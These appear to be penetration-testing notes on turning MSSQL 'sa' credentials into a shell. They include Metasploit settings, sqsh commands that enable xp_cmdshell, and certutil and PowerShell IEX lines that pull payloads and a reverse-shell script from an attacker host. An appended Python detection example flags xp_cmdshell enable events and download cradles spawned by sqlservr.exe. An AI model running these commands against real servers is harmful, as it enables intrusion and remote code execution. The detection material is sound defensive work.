Once we have credentials for the MSSQL server, we can get a shell on the host through either Metasploit or sqsh.
Metasploit:
use windows/mssql/mssql_payload
set RHOSTS victim-ip
set USERNAME sa
set PASSWORD password
SQSH:
sqsh -S victim-ip -U sa -P password
exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go
xp_cmdshell 'whoami'
go
output:
weoweo\wewo
Alternatively, you can use PowerShell to get a reverse shell, or pull down and run your own payload.
xp_cmdshell 'certutil -urlcache -f http://myip:myport/msf.exe msf.exe'
go
then
xp_cmdshell 'cmd /c msf.exe'
go
or
xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString(''http://192.168.119.177/Invoke-PowerShellTcp.ps1'')'
go
(single quotes work regardless of the session's QUOTED_IDENTIFIER setting; quotes inside the string are doubled)
Credits to my friend Adam :)
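Everything above leaves two clear traces on the victim: SQL Server writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line to its ERRORLOG when sp_configure/RECONFIGURE flips the option, and every xp_cmdshell call spawns cmd.exe as a child of sqlservr.exe. The following is an added detection example (not part of the original notes) that runs those two checks over constructed sample data: the ERRORLOG lines and the process-creation records are made up for the example, the record field names (parent, image, cmdline) are an assumption rather than any vendor's schema, and the IP 203.0.113.5 is a documentation address.

```python
import re

# Constructed SQL Server ERRORLOG lines (sample data, not from a real host).
# The "Configuration option ... changed" message is the one SQL Server logs
# when sp_configure/RECONFIGURE changes a server option.
ERRORLOG_LINES = [
    "2024-01-15 10:02:11.43 spid55      Configuration option 'show advanced options' "
    "changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-15 10:02:12.10 spid55      Configuration option 'xp_cmdshell' "
    "changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2024-01-15 10:05:00.00 spid9       Server process ID is 1234.",
]

# Constructed process-creation events in the shape a Sysmon/EDR sensor would
# give. Field names are an assumption for this example, not a vendor schema.
PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": '"cmd.exe" /c certutil -urlcache -f http://203.0.113.5:8080/msf.exe msf.exe'},
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": '"cmd.exe" /c powershell IEX(New-Object Net.WebClient).DownloadString(\'http://203.0.113.5/x.ps1\')'},
    {"parent": r"C:\Windows\explorer.exe",          # ordinary user shell, not the DB engine
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": '"cmd.exe" /c whoami'},
]

CONFIG_CHANGE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)

# Command-line fragments typical of a download cradle launched through xp_cmdshell.
DOWNLOAD_CRADLE = re.compile(
    r"certutil.*-urlcache|downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin.*/transfer",
    re.IGNORECASE,
)


def xp_cmdshell_enabled_events(lines):
    """Return the ERRORLOG lines where xp_cmdshell was switched from off to on."""
    hits = []
    for line in lines:
        m = CONFIG_CHANGE.search(line)
        if m and m["option"].lower() == "xp_cmdshell" and m["new"] == "1":
            hits.append(line)
    return hits


def sqlserver_child_alerts(events):
    """Flag processes spawned by sqlservr.exe; rate them high if the command
    line looks like a download cradle, medium otherwise (any child of the
    database engine deserves a look, since xp_cmdshell is the usual cause)."""
    alerts = []
    for ev in events:
        parent_name = ev["parent"].lower().rsplit("\\", 1)[-1]
        if parent_name != "sqlservr.exe":
            continue
        severity = "high" if DOWNLOAD_CRADLE.search(ev["cmdline"]) else "medium"
        alerts.append({"image": ev["image"], "severity": severity, "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for line in xp_cmdshell_enabled_events(ERRORLOG_LINES):
        print("xp_cmdshell enabled:", line)
    for alert in sqlserver_child_alerts(PROCESS_EVENTS):
        print(f"[{alert['severity']}] sqlservr.exe spawned {alert['image']}: {alert['cmdline']}")
```

In practice the ERRORLOG hit is the cheaper signal (one line per enable, and the spid lets you join it to the login that ran sp_configure), while the parent/child rule catches use of xp_cmdshell on instances where it was already enabled. Where the option is not needed at all, keeping it disabled and alerting on any change to it removes the whole technique.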